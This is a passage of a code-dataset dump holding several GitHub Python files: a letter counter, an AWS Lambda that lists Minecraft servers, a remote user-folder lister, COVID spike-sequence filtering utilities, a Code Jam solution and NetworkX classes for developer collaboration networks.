message.count(letter)\nprint(\"\\n\" + name + \", your message has \" + str(letter_count) + \" \" + letter + \"'s in it.\")\n","repo_name":"PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today","sub_path":"2_Basic Data Types/Challenge_1_Letter_Counter_App.py","file_name":"Challenge_1_Letter_Counter_App.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"42198779344","text":"\"\"\"Handlers for API operations at /server level.\"\"\"\n\nimport json\nimport logging\nimport boto3\nimport ec2mapper\nimport myutils\n\nlogger = myutils.get_logger(__name__, logging.INFO)\n\n\n@myutils.log_calls(level=logging.DEBUG)\ndef get_handler(event, context): # pylint: disable=unused-argument\n \"\"\"REST API GET method to list Minecraft game servers.\n\n Parameters\n ----------\n event: dict, required\n API Event Input Format\n\n context: object, required\n Lambda Context runtime methods and attributes\n\n Returns\n -------\n API Gateway Lambda Output Format: dict\n \"\"\"\n # gather data for HTTP response\n servers = gather()\n\n # return the HTTP payload\n return {\n 'statusCode': 200,\n 'body': json.dumps({\n 'servers': servers\n })\n }\n\n\n@myutils.log_calls\ndef gather():\n \"\"\"Return a list of Minecraft game servers.\"\"\"\n # initialize AWS SDK query filters\n filters = []\n filters.append(myutils.get_application_filter())\n filters.append(myutils.get_instance_filter())\n\n # invoke the AWS SDK to get relevant EC2 instances\n ec2_client = boto3.client('ec2')\n reservations = ec2_client.describe_instances(Filters=filters)\n\n servers = ec2mapper.parse(reservations)\n return servers\n","repo_name":"cpolanec/minecraft-server-controller","sub_path":"src/mcservers.py","file_name":"mcservers.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10748959208","text":"#Este script simplemente imprime las carpetas que se encuentran dentro de C:\\Users.\r\n#La idea es pasarlo a Powershell.\r\n#github.com/gastonhz/Pywershell\r\nimport os\r\nimport re\r\nhostname=input(\"Ingresar host: \")\r\nruta=r\"\\\\\"+hostname+r\"\\c$\"+r\"\\Users\"+r\"\\\\\"\r\nusers=os.listdir(ruta)\r\nprint(\"Usuarios encontrados:\")\r\nprint(users)\r\n","repo_name":"gastonhz/Pywershell","sub_path":"Usuarios en PC.py","file_name":"Usuarios en PC.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761290834","text":"'''covid-specific utilities and hardcoded values'''\n\nimport os\nimport re\nimport argparse\nimport datetime\nimport itertools as it\nfrom pathlib import Path\nimport warnings\n\nfrom verbose import verbose as v\nimport intlist\nimport wrapgen\nimport readseq\nimport sequtil\nimport mstringfix\nimport mutant\n\nMAX_TITLE_LENGTH=60 ## truncate long title names\nISO_DATE_REGEX = re.compile(r'\\d\\d\\d\\d-\\d\\d(-\\d\\d)?')\nISO_DATE_REGEX_DOTS = re.compile(r'\\.(\\d\\d\\d\\d-\\d\\d-\\d\\d)\\.')\nEPI_ISL_REGEX = re.compile(r'EPI_ISL_\\d+')\nLINEAGE_REGEX = re.compile(r'EPI_ISL_\\d+\\.(.*)')\n\nDEFAULTSEQFILE=\"Latest.fasta\"\n\ndef default_seqfile(seqfilename=DEFAULTSEQFILE):\n '''\n return the default file for input sequences;\n hunt around in various directories until you find it\n '''\n for d in [os.getenv('DATA'),\n '.',\n 'data',\n '..',\n '../data',\n ]:\n if not d:\n continue\n seqfile = Path(d) / seqfilename\n if seqfile.exists():\n return seqfile\n seqfile = Path(d) / (seqfilename + \".gz\")\n if seqfile.exists():\n return seqfile\n seqfile = Path(d) / (seqfilename + \".xz\")\n if seqfile.exists():\n return seqfile\n\n return None\n\n\ndef corona_args(ap):\n '''\n call this in the getargs() function,\n and these options will be added in\n '''\n\n ### Check --dates option; is format okay? are they in order?\n def datestring(yyyymmdd):\n ''' check format of dates; should be yyyy-mm-dd '''\n ## (but '.' is also allowed to indicated a default)\n if (not re.match(r'\\d\\d\\d\\d-\\d\\d-\\d\\d',yyyymmdd)\n and yyyymmdd != '.'):\n raise ValueError(f'Invalid date {yyyymmdd}; '\n f'should be in yyyy-mm-dd format')\n return yyyymmdd\n\n class CheckDates(argparse.Action):\n ''' check that the dates are good and that they are in order '''\n def __call__(self,parser,namespace,dates,option_string=None):\n dates = [datestring(date) for date in dates]\n if not any(bool(date == \".\") for date in dates):\n if dates[0] > dates[1]:\n parser.error(f'Dates out of order: {dates}')\n setattr(namespace,self.dest,dates)\n\n paa = ap.add_argument\n #faa = ap.add_argument_group('File input options').add_argument\n paa(\"--input\",\"-i\",type=Path,\n default=default_seqfile(),\n help=\"input file with aligned sequences (first is reference)\")\n paa(\"--nseq\",type=int,default=0,\n help=\"read at most NSEQ sequences\")\n paa(\"--filterbyname\",\"-f\",nargs='+',\n help=\"Only use sequences whose name matches this pattern\")\n paa(\"--xfilterbyname\",\"-x\",nargs='+',\n help=\"Do not use sequences whose name matches this pattern\")\n paa(\"--dates\",\"-d\",nargs=2,type=datestring,action=CheckDates,\n help=\"Only use seqs in range of dates (two dates, yyyy-mm-dd format)\")\n paa(\"--days\",type=int,default=0,\n help=\"Consider date range of DAYS days ending on the last sampled date\")\n paa(\"--stripdashcols\",action=\"store_true\",\n help=\"Strip columns with dash in reference sequence\")\n paa(\"--keeplastchar\",action=\"store_true\",\n help=\"Do not strip final stop codon from end of sequences\")\n paa(\"--keepx\",action=\"store_true\",\n help=\"Keep sequences that include bad characters, denoted X\")\n paa(\"--skipx\",action=\"store_false\",dest='keepx',\n help=\"Skip sequences that include bad characters, denoted X\")\n ap.set_defaults(keepx=False)\n paa(\"--title\",\n help=\"use this TITLE in plots\")\n\n#### Routines for parsing sequence names\n\nxpand_WHO_Pangolin = {\n ## dict to convert WHO lineage names to pango pattern\n 'Alpha': r'(B\\.1\\.1\\.7)|(Q\\.[1-9].*)',\n 'Beta': r'B\\.1\\.351',\n 'Gamma': r'P\\.1.*',\n 'Delta': r'(B\\.1\\.617\\.2)|(AY\\.[1-9].*)',\n 'Lambda': r'C\\.37',\n 'Mu': r'B\\.1\\.621(\\.1)?',\n 'Omicron': r'(B\\.1\\.1\\.529)|(BA\\.[1-9].*)',\n}\ndef expand_who_name_to_pangolin_pattern(patt):\n '''\n if patt is one of the WHO names, then\n replace it with its associated pangolin\n pattern\n '''\n return xpand_WHO_Pangolin.get(patt,patt)\n\nBASELINE_MSTRINGS = {\n 'Wuhan' : \"\",\n 'BA.2' : \"T19I,L24-,P25-,P26-,A27S,G142D,V213G,G339D,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,S477N,T478K,E484A,Q493R,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'BA.5' : \"T19I,L24-,P25-,P26-,A27S,H69-,V70-,G142D,V213G,G339D,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,L452R,S477N,T478K,E484A,F486V,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'BA.2.75': \"T19I,L24-,P25-,P26-,A27S,G142D,K147E,W152R,F157L,I210V,V213G,G257S,G339H,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,G446S,N460K,S477N,T478K,E484A,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'XBB.1.5': \"T19I,L24-,P25-,P26-,A27S,V83A,G142D,Y144-,H146Q,Q183E,V213E,G252V,G339H,R346T,L368I,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,V445P,G446S,N460K,S477N,T478K,E484A,F486P,F490S,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n\n}\n\ndef get_baseline_mstring(lineage='Wuhan'):\n mstring = BASELINE_MSTRINGS.get(lineage,\"\")\n mstring = mstringfix.mstring_brackets(mstring)\n return mstring\n\ndef reset_baseline(firstseq,lineage):\n '''use lineage instead of Wuhan as baseline \"first\" sequence'''\n mut_mgr = mutant.MutationManager(firstseq)\n base_mstring = get_baseline_mstring(lineage)\n if not base_mstring:\n return firstseq\n base_mutant = mutant.Mutation(base_mstring)\n base_seq = mut_mgr.seq_from_mutation(base_mutant)\n return base_seq \n\ndef get_isl(fullname):\n '''return EPI_ISL number from the sequence name'''\n epi_match = EPI_ISL_REGEX.search(fullname)\n return epi_match[0] if epi_match else \"X\"\n\ndef get_lineage_from_name(name):\n '''get pango lineage by parsing the sequence name'''\n m = LINEAGE_REGEX.search(name)\n linpatt = m[1] if m else None\n #try:\n # tokens = name.split('.',6)\n # lintok = tokens[6]\n #except IndexError:\n # lintok = None\n #if linpatt != lintok:\n # print(\"name=\",name,\"patt:\",linpatt,\"token:\",lintok)\n return linpatt\n\ndef date_fromiso(s):\n '''return datetime.date object from date string in yyyy-mm-dd format'''\n ## if \".\" or invalid (quite different cases!), return None\n ## problem with raising error is that many badly formatted dates out there\n ## this routine is necessary since date.fromisoformat() function is\n ## not available until python version 3.7\n if isinstance(s, datetime.date):\n return s\n try:\n yyyy,mm,dd = s.split(\"-\")\n dt = datetime.date(int(yyyy),int(mm),int(dd))\n return dt\n except (ValueError,AttributeError,TypeError):\n ## various things can go wrong\n return None\n\ndef date_from_seqname(sname):\n '''extract date string from sequence name'''\n try:\n tokens = sname.split('.')\n datestr = tokens[4]\n except IndexError:\n v.vprint_only(5,\"Invalid name:\",sname)\n datestr = sname\n if not ISO_DATE_REGEX.match(datestr):\n v.vprint_only(5,\"Invalid date:\",datestr,sname)\n m = ISO_DATE_REGEX_DOTS.search(sname)\n datestr = m[1] if m else None\n return date_fromiso(datestr)\n\ndef count_bad_dates(seqlist):\n return sum(date_from_seqname(s.name) is None for s in seqlist)\n\ndef range_of_dates(seqlist):\n '''return tuple of iso-formatted dates'''\n assert isinstance(seqlist,list)\n dates = [date_from_seqname(s.name) for s in seqlist]\n dates = [d for d in dates if d is not None]\n v.vprint(\"Range of dates based on\",len(dates),\"sequences\")\n return (min(dates).isoformat(),\n max(dates).isoformat())\n\ndef filter_by_date(seqs,fromdate,todate,keepfirst=False):\n '''input seqs is iterable (list or iterator); output is generator'''\n\n f_date = date_fromiso(fromdate)\n t_date = date_fromiso(todate)\n\n for n,s in enumerate(seqs):\n if keepfirst and n == 0:\n yield s\n continue\n d = date_from_seqname(s.name)\n if not d:\n continue\n if f_date and f_date > d:\n continue\n if t_date and t_date < d:\n continue\n yield s\n\nsite_specifications = {\n \"RBD\" : \"330-521\",\n \"NTD\" : \"14-292\",\n \"NTDss\" : \"13-20,140-158,242-264\",\n \"xNTDss\" : \"13-17,19,20,69,70,138-141,143-158,242-264\",\n \"NTDss_trunc\" : \"140-158,242-264\",\n \"NTDish\" : \"13,18,20,69,70,141-144,152,153,157,242-244,253-257,262\",\n \"RBDish\" : \"367,417,439,440,452,453,477,478,484,490,494,501,520,614\",\n \"RBDplus\" : \"330-521,655,675,679,681\", ## obsolete, now use RBD+Furin\n \"Furin\" : \"655,675,677,679,681,950\",\n}\n\ndef spike_sites(sitespec):\n '''return list of integers, site numbers, corresponding to sitespec string'''\n ## sitespec may be of the form:\n ## '13-20,140-158' -- integer list\n ## 'RBD' -- receptor binding domain\n ## 'NTD', 'NTDss' -- N-terminal domain (supersite)\n ## Combinations of the above using \"+\" and \"-\"\n ## 'RBD+NTD' -- include sites in either domain\n ## 'NTD-18' -- all sites in NTD except 18\n ## 'RBD+18' -- all sites in RBD plus site 18\n ## Problematic (don't do this, if you can avoid it):\n ## Because '-' can indicate a 'remove site' or can indicate a numeric range\n ## there are some unfortunate ambiguities\n ## 'RBD+1-10' -- Ambiguous:\n ## RBD plus 1 minus 10 /or/ RBD plus 1 through 10 ??\n ## You should get RBD plus 1 thru 10, but be careful\n ## NTDss+69+70-18+RBD -- worse than ambiguous, will not include 70, will include 18\n ## because \"70-18\" -> \"\" since it's an invalid range\n ## NTDss-18+69+70+RBD -- will give that right answer\n ## 69-70+NTDss-18+RBD -- may give right answer, but awkward formulation\n ##\n site_specs_internal = {key.upper(): value for key,value in site_specifications.items()}\n def get_intlist(s):\n return intlist.string_to_intlist( site_specs_internal.get(s.upper(),s) )\n xsite = set() ## set of sites to be excised\n sites = set() ## set of sites to be included\n for spec in sitespec.split('+'):\n if re.match(r'\\d.*',spec):\n sites.update(get_intlist(spec))\n continue\n specx = spec.split('-')\n sites.update(get_intlist(specx[0]))\n for sx in specx[1:]:\n xsite.update( get_intlist(sx) )\n sites -= xsite\n return sorted(sites)\n\n\nCONTINENTS = [\"United-Kingdom\",\n \"Europe-minus-United-Kingdom\",\n \"North-America\",\n \"Asia\",\n \"Africa\",\n \"South-America\",\n \"Oceania\",\n]\nABBREV_CONTINENTS = {\"United-Kingdom\" : \"UK\",\n \"Europe-minus-United-Kingdom\": \"Eu-UK\",\n \"North-America\" : \"NAmer\",\n \"Asia\" : \"Asia\",\n \"Africa\" : \"Africa\",\n \"South-America\" : \"SAmer\",\n \"Oceania\" : \"Ocean\",\n}\n\ndef parse_continents(withglobal=False):\n '''\n returns a list of three-element tuples (cx,c,x)\n cx: full name of region, possibly including '-minus-'\n c: included part of region, before the '-minus-'\n x: excluded part of region, after the '-minus-'\n [in most cases, cx=c and x=None]\n '''\n cx_c_x=[]\n if withglobal:\n cx_c_x.append((\"Global\",\"Global\",None))\n for cx in CONTINENTS:\n if \"-minus-\" in cx:\n c,x = cx.split(\"-minus-\")\n else:\n c,x = cx,None\n cx_c_x.append((cx,c,x))\n return cx_c_x\n\ndef filename_prepend(pre,file):\n '''prepend a string to a file name; eg\n \"pre\",\"file\" -> \"prefile\", but also\n \"pre\",\"directory/file\" -> \"directory/prefile\"\n '''\n ## alt: re.sub(r\"(.*/)?([^/]+)\",r\"\\1\"+pre+r\"\\2\",file)\n if not file:\n return file\n directory,base = os.path.split(file)\n return os.path.join(directory,pre+base)\n\ndef get_title(args):\n '''produce default title for plots and tables'''\n if args.title:\n return \"Global\" if args.title=='.' else args.title\n if args.filterbyname:\n newfilterbynames = [re.sub('-minus-',' w/o ',name)\n for name in args.filterbyname]\n title = \"+\".join(newfilterbynames)\n else:\n title = \"Global\"\n if args.xfilterbyname:\n title = title + \" w/o \" + \"+\".join(args.xfilterbyname)\n if len(title) > MAX_TITLE_LENGTH:\n title = title[:MAX_TITLE_LENGTH-3]+\"...\"\n return title\n\ndef get_first_item(items,keepfirst=True):\n '''\n get first item in iterable, and and put it back;\n works when the iterable is a list or an iterator\n if keepfirst==False, then don't put it back\n '''\n warnings.warn(\"use sequtil.get not covid.get\")\n return sequtil.get_first_item(items,keepfirst=keepfirst)\n\ndef read_filter_seqfile(args,**kwargs):\n '''\n read sequence file from args.input,\n and filter according to args,\n return a generator of sequences\n '''\n seqs = read_seqfile(args,**kwargs)\n seqs = filter_seqs(seqs,args)\n\n return seqs\n\ndef read_seqfile(args,**kwargs):\n '''\n read sequences file from args.input\n return a generator of sequences\n '''\n seqs = readseq.read_seqfile(args.input,badchar='X',**kwargs)\n if args.verbose:\n seqs = wrapgen.keepcount(seqs,\"Sequences read:\")\n return seqs\n\n\ndef fix_seqs(seqs,args):\n '''\n seqs = fix_seqs(seqs,args)\n will return sequences with stripdashcols (obsolete)\n and with last character (if it's $) stripped\n and\n '''\n ## ...a bit heavy-handed, and assumes first seq is still there\n\n ## we peek at first sequence, but do not remove it from seqs\n first,seqs = sequtil.get_first_item(seqs)\n\n if \"-\" in first.seq and args.stripdashcols:\n seqs = sequtil.stripdashcols(first.seq,seqs)\n\n if not args.keeplastchar:\n if first.seq and first.seq[-1] in \"$*X\":\n stop_codon = first.seq[-1]\n first.seq = first.seq[:-1]\n seqs = striplastchars(seqs,len(first.seq))\n\n if not args.keepx:\n seqs = (s for s in seqs if \"X\" not in s.seq)\n\n return seqs\n\ndef striplastchars(seqs,seqlen):\n '''\n truncate all sequences to length seqlen;\n '''\n for s in seqs:\n s.seq = s.seq[:seqlen]\n yield s\n\ndef filter_seqs(seqs,args):\n '''filter sequences according to args: by date, by pattern, by nseq'''\n ## by date first so multiple runs will have the same date range\n ## with --days option\n seqs = filter_seqs_by_date(seqs,args)\n seqs = filter_seqs_by_pattern(seqs,args)\n seqs = fix_seqs(seqs,args)\n if args.nseq:\n seqs = it.islice(seqs,args.nseq+1)\n if args.verbose:\n seqs = wrapgen.keepcount(seqs,\"Sequences filtered:\")\n\n return seqs\n\ndef xrepair(seqs,X='X'):\n '''replace all occurrences of X with the ancestral form in first sequence'''\n ## This seems dangerous!! Use with care ... or not at all.\n first,seqs = sequtil.get_first_item(seqs)\n ref = first.seq\n for s in seqs:\n if X in s.seq:\n ss = list(s.seq)\n for n in range(len(ss)):\n if ss[n] == X:\n ss[n] = ref[n]\n s.seq = \"\".join(ss)\n yield s\n\ndef lastdate_byfile(file,seqs=None):\n '''return the last date in the range of dates'''\n ## to get last date\n ## 1/ get modification date of input file\n ## 2/ if that doesn't work (eg, if file not found), get today's date\n ## 3/ if that doesn't work (but why wouldn't it?), get last date in dataset\n ## 4/ if that doesn't work, raise RuntimeError\n ## Note, if seqs is None, then skip step 3\n\n lastdate=None ## in case nothing works!\n try:\n mtime = os.path.getmtime(file)\n lastdate = datetime.date.fromtimestamp(mtime).isoformat()\n except FileNotFoundError:\n try:\n lastdate = datetime.date.today().isoformat()\n except: ## don't think this will ever happen\n if seqs:\n seqs = list(seqs)\n _,lastdate = range_of_dates(seqs)\n\n if lastdate is None:\n raise RuntimeError('Cannot find last date for date range')\n\n return lastdate\n\ndef date_range_from_args(args):\n '''return list of two iso-formatted dates (start and stop);\n obtain what /should/ be in args.dates, but if it is not set,\n then infer what it should be from args.days'''\n if args.dates:\n return [(None if date=='.' else date)\n for date in args.dates]\n if args.days:\n lastdate = lastdate_byfile(args.input)\n t = date_fromiso(lastdate)\n f = t - datetime.timedelta(days=args.days)\n return [f.isoformat(),t.isoformat()]\n return [None,None]\n\ndef expand_date_range(daterange,daysperweek=7):\n '''pad the date range by a few (or many) days out front\n so that weekly and/or cumulative counts are mainteined\n correctly'''\n start_date,stop_date = daterange\n if start_date is None or start_date == '.':\n return daterange\n if daysperweek == 0:\n start_date = None\n elif daysperweek > 1:\n start_date = date_fromiso(start_date)\n start_date = start_date - datetime.timedelta(days=daysperweek-1)\n start_date = start_date.isoformat()\n return [start_date,stop_date]\n\n\ndef filter_seqs_by_date(seqs,args,keepfirst=True):\n '''passes through seq's whose date is in range specified by args;\n also, ensures that args.dates is set to range of dates (eg, if range\n specified by --days, then set args.dates to be consistent with that)\n '''\n\n if not args.days and not args.dates:\n return seqs\n if args.days and args.dates:\n raise RuntimeError(\"Cannot specify both --days AND --dates\")\n\n if args.days:\n args.dates = date_range_from_args(args)\n\n if args.dates:\n seqs = filter_by_date(seqs,args.dates[0],args.dates[1],keepfirst=keepfirst)\n\n return seqs\n\ndef filter_seqs_by_pattern(seqs,args,keepfirst=True):\n '''input is iterable seqs; output is generator seqs'''\n\n keepers = []\n xcludes = []\n if args.filterbyname:\n for name in args.filterbyname:\n patt,_,xpat = name.partition(\"-minus-\")\n patt = expand_who_name_to_pangolin_pattern(patt)\n if patt != \"Global\":\n keepers.append(patt)\n if xpat:\n xcludes.append(xpat)\n if args.xfilterbyname:\n for name in args.xfilterbyname:\n name = expand_who_name_to_pangolin_pattern(name)\n xcludes.append(name)\n\n ## Use r\"\\.\"+ to ensure that names have to be preceded by a dot\n keepers = [r\"\\.\"+patt for patt in keepers]\n xcludes = [r\"\\.\"+xpat for xpat in xcludes]\n\n if keepers:\n seqs = sequtil.filter_by_patternlist(seqs,keepers,\n keepfirst=keepfirst)\n if xcludes:\n seqs = sequtil.filter_by_patternlist_exclude(seqs,xcludes,\n keepfirst=keepfirst)\n\n return seqs\n\nSARS_REGIONS = '''\nSP 1 13\nNTD 27 292\nRBD 330 521\nRBM 438 506\nSD1 528 590\nSD2 591 679\n#S1 685 685\n#S2 686 686\nFP 816 833\nHR1 908 985\nCH 986 1035\nCD 1076 1140\nHR2 1162 1204\nTM 1214 1236\n'''\n\nMERS_REGIONS='''\nSP 1 18\nNTD 18 350\nRBD 382 588\nRBM 483 566\nSD1 595 656\nSD2 657 747\n#S1/S2 748 749 The cleavage site\nUH 816 851\nFP 880 900\nCR 901 991\nHR1 992 1054\nCH 1055 1109\nBH 1110 1149\nSD3 1150 1206\nHR2 1246 1294\nTM 1295 1329\n'''\n\ndef get_srlist(virus=\"SARS\"):\n ''' provides a tuple of three lists: n,x,y\n n = name of region\n x = start site\n y = stop site\n '''\n n=[]\n x=[]\n y=[]\n regions = MERS_REGIONS if virus.lower() == \"mers\" else SARS_REGIONS\n for sr in regions.split('\\n'):\n srs = sr.split()\n if len(srs) == 3 and srs[0][0]!='#':\n n.append(srs[0])\n x.append(int(srs[1]))\n y.append(int(srs[2]))\n return n,x,y\n\n## EXAMPLE USAGE:\n# f = max(e)/2\n# dy = -0.04*f\n# dyl = -0.12*f\n#\n# for srx,sry,srn in zip(srlistx,srlisty,srlistn):\n# plt.plot([srx,sry],[dy,dy],label=srn,linewidth=4)\n# delta = 8 if sry-srx < 15 else 3 if sry-srx < 25 else 0\n# plt.text(srx-delta,dyl,srn)\n# plt.legend(loc=\"upper left\",title=\"Regions\",bbox_to_anchor=(1,1))\n","repo_name":"jt-lanl/cov-voc","sub_path":"covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":20743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23452683261","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef read_configuration():\n tmp = sys.stdin.readline().split()\n return (int(tmp[0]), list(map(int, tmp[1])))\n\nif __name__ == '__main__':\n T = int(sys.stdin.readline())\n \n for t in range(1, T+1):\n S_max, audience = read_configuration()\n \n total_added, standing = 0, audience[0]\n for shyness in range(1, S_max+1):\n added = 0\n if audience[shyness] > 0 and standing < shyness:\n added += shyness - standing\n total_added += added\n standing += audience[shyness] + added\n \n print('Case #{}: {}'.format(t, total_added))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2650.py","file_name":"2650.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16919560898","text":"import networkx as nx \n\nfrom constants import *\nimport variables as var\n\nfrom utils.developerClass import DeveloperEmpirical\n\nclass Network:\n def __init__(self, net):\n self.net = net\n \n def getNet(self):\n return self.net\n\n # net attribs\n def setNetAttrib(self, attribName, attribValue):\n self.net.graph[attribName] = attribValue\n\n def setInitialDate(self, d):\n self.net.graph[NET_INITIAL_DATE] = d\n\n def attribInNet(self, attribName):\n return attribName in self.net.graph\n\n def getNetAttrib(self, attribName):\n return self.net.graph[attribName]\n\n # nodes\n def addNode(self, item, type=None, otherAttribs=None):\n if item not in self.net:\n if type != None and otherAttribs != None:\n self.net.add_node(item, type=type, **otherAttribs)\n if type != None:\n self.net.add_node(item, type=type)\n else:\n self.net.add_node(item)\n\n def hasNode(self, item):\n return self.net.has_node(item)\n\n def getOrCreateDeveloper(self, devInfo):\n sDevInfo = devInfo.split(\";\")\n\n if len(sDevInfo) == 2:\n name, email, login = sDevInfo[0], sDevInfo[1], \"None\"\n elif len(sDevInfo) == 3:\n login, name, email = sDevInfo[0], sDevInfo[1], sDevInfo[2]\n\n devsPoints = {}\n for devEmpiricalInstance in self.getDeveloperNodes():\n points = 0\n if name != \"None\":\n if devEmpiricalInstance.getName() == name:\n points += 1\n if email != \"None\":\n if devEmpiricalInstance.getEmail() == email:\n points += 1\n if login != \"None\":\n if devEmpiricalInstance.getLogin() == login:\n points += 1\n if points != 0:\n devsPoints[devEmpiricalInstance] = points\n\n if devsPoints == {}:\n d = DeveloperEmpirical(name, login, email)\n self.net.add_node(d, type=DEV_TYPE)\n else:\n d = max(devsPoints, key=devsPoints.get)\n \n return d\n\n def removeNode(self, item):\n if item in self.net.nodes():\n self.net.remove_node(item)\n\n def getNodes(self, getAttribs = False):\n return self.net.nodes(data=getAttribs) \n\n def getFileNodes(self):\n return list(dict(filter(lambda n: n[1][\"type\"] == FILE_TYPE, self.net.nodes(data=True))).keys())\n\n def getMethodNodes(self):\n return list(dict(filter(lambda n: n[1][\"type\"] == METHOD_TYPE, self.net.nodes(data=True))).keys())\n\n def getFileNodesNotEliminated(self):\n return list(filter(lambda x: not x.startswith(\"ELIMINATED_\"), dict(filter(lambda n: n[1][\"type\"] == FILE_TYPE, self.net.nodes(data=True))).keys()))\n\n def getDeveloperNodes(self):\n return list(dict(filter(lambda n: type(n[0]) == DeveloperEmpirical, self.net.nodes(data=True))).keys())\n\n def getDevNamed(self, name):\n devs = {d.name: d for d in self.getDeveloperNodes()}\n if name in devs.keys():\n return devs[name]\n else:\n return -1\n\n def getNodeAttributes(self, attrib):\n return dict(nx.get_node_attributes(self.net, attrib))\n\n def setNodeAttributes(self, attrib):\n nx.set_node_attributes(self.net, attrib)\n\n def relabelNodes(self, relabel, copy=False):\n nx.relabel_nodes(self.net, relabel, copy=copy)\n\n # edges\n\n def addEdgeOrWeightToNetwork(self, item1, item2, newWeight=1, types=None, weightName=ST_WEIGHT, date=None):\n net = self.getNet()\n\n if types != None: \n if item1 not in net.nodes():\n net.add_node(item1, type=types[0])\n if item2 not in net.nodes():\n net.add_node(item2, type=types[1])\n else:\n if item1 not in net.nodes():\n net.add_node(item1)\n if item2 not in net.nodes():\n net.add_node(item2)\n\n e = (item1, item2)\n if net.get_edge_data(*e) != None:\n if weightName not in net.get_edge_data(*e):\n edgeAttributes = net.get_edge_data(*e)\n edgeAttributes[weightName] = newWeight\n nx.set_edge_attributes(net, {e: edgeAttributes})\n else:\n edgeAttributes = net.get_edge_data(*e)\n edgeAttributes[weightName] += newWeight\n if date != None:\n edgeAttributes[\"commitsInfo\"][date] = PLACE_HOLDER\n nx.set_edge_attributes(net, {e: edgeAttributes})\n else:\n net.add_edge(*e, **{weightName: newWeight, \"commitsInfo\": {date: PLACE_HOLDER}})\n\n def getEdgesOfNode(self, node):\n return self.net.edges(node)\n\n def getEdgeData(self, n1, n2, attrib):\n return self.net.get_edge_data(n1, n2)[attrib]\n \n # degree\n def getDegrees(self, nbunch=None, weight=None):\n if nbunch == None and weight == None:\n return dict(nx.degree(self.net))\n elif nbunch == None and weight != None:\n return dict(nx.degree(self.net, weight=weight))\n elif nbunch != None and weight == None:\n return dict(nx.degree(self.net, nbunch=nbunch))\n elif nbunch != None and weight != None:\n return dict(nx.degree(self.net, nbunch=nbunch, weight=weight))\n\n def getDegree(self, n, weight=None):\n return self.getDegrees(weight=weight)[n]\n\n def degreeOfNode(self, node, weight=None):\n if weight == None:\n return self.net.degree(node)\n else:\n return self.net.degree(node, weight=weight)\n\n def saveNet(self):\n nx.write_gpickle(self.net, self.net.graph[\"netPath\"])\n\n# -----\n\nclass devToDevNetworks():\n def __init__(self, fileOrMethodAnalysis, net, devToItem, save=True):\n self.fileOrMethodAnalysis = fileOrMethodAnalysis\n self.D2INet: Network = devToItem\n\n self.net: Network = net\n self.createAndSaveD2DNets()\n\n if save:\n self.net.saveNet()\n \n def createAndSaveD2DNets(self):\n if self.fileOrMethodAnalysis == FILE_TYPE:\n itemNodes = self.D2INet.getFileNodes()\n elif self.fileOrMethodAnalysis == METHOD_TYPE:\n itemNodes = self.D2INet.getMethodNodes()\n \n collaborationPerFile = {}\n\n for iNo in itemNodes: # item can be a file or a method.\n collaborationPerFile[iNo] = 0\n devsConnectedToItem = list(map(lambda x: x[1], self.D2INet.getEdgesOfNode(iNo)))\n for di in range(len(devsConnectedToItem)):\n d1 = devsConnectedToItem[di]\n diDates = self.D2INet.getEdgeData(d1, iNo, 'commitsInfo')\n if di + 1 != len(devsConnectedToItem):\n for dj in range(di + 1, len(devsConnectedToItem)):\n d2 = devsConnectedToItem[dj]\n\n djDates = self.D2INet.getEdgeData(d2, iNo, 'commitsInfo')\n numberOfCommitsInCollaborationTR = self.c_count(diDates, djDates)\n collaborationPerFile[iNo] += numberOfCommitsInCollaborationTR\n if numberOfCommitsInCollaborationTR != 0:\n self.net.addEdgeOrWeightToNetwork(d1, d2, newWeight=numberOfCommitsInCollaborationTR, weightName=D2D_WEIGHT)\n\n\n n: Network = self.net\n\n # Saving D2I weighted degree to D2D nodes attributes\n devNodes = self.D2INet.getDeveloperNodes()\n if self.fileOrMethodAnalysis == FILE_TYPE:\n attribName = F_CHANGES_BY_DEV\n else:\n attribName = M_CHANGES_BY_DEV\n n.setNodeAttributes({k: {attribName: v} for k, v in self.D2INet.getDegrees(nbunch=devNodes, weight=ST_WEIGHT).items()})\n \n self.net.setNetAttrib(COLLAB_PER_FILE, collaborationPerFile)\n \n def c_count(self, commitsInfo1, commitsInfo2):\n maximumSecondsIntervalToConsiderCollaboration = 60 * 60 * 24 * 31 * var.MAX_MONTHS_COLLAB\n collabNr = 0\n i, j = 0, 0\n datesI, datesJ = list(commitsInfo1.keys()), list(commitsInfo2.keys())\n while (i < len(datesI) and j < len(datesJ)):\n d1 = datesI[i]\n d2 = datesJ[j]\n\n if abs((d2 - d1).total_seconds()) < maximumSecondsIntervalToConsiderCollaboration:\n collabNr += 1\n i += 1\n j += 1\n \n elif d1 > d2:\n j += 1\n \n elif d1 < d2:\n i += 1\n \n return collabNr","repo_name":"josemiguelpgomes/MasterThesis","sub_path":"code/utils/networksClasses.py","file_name":"networksClasses.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19347931439","text":"from 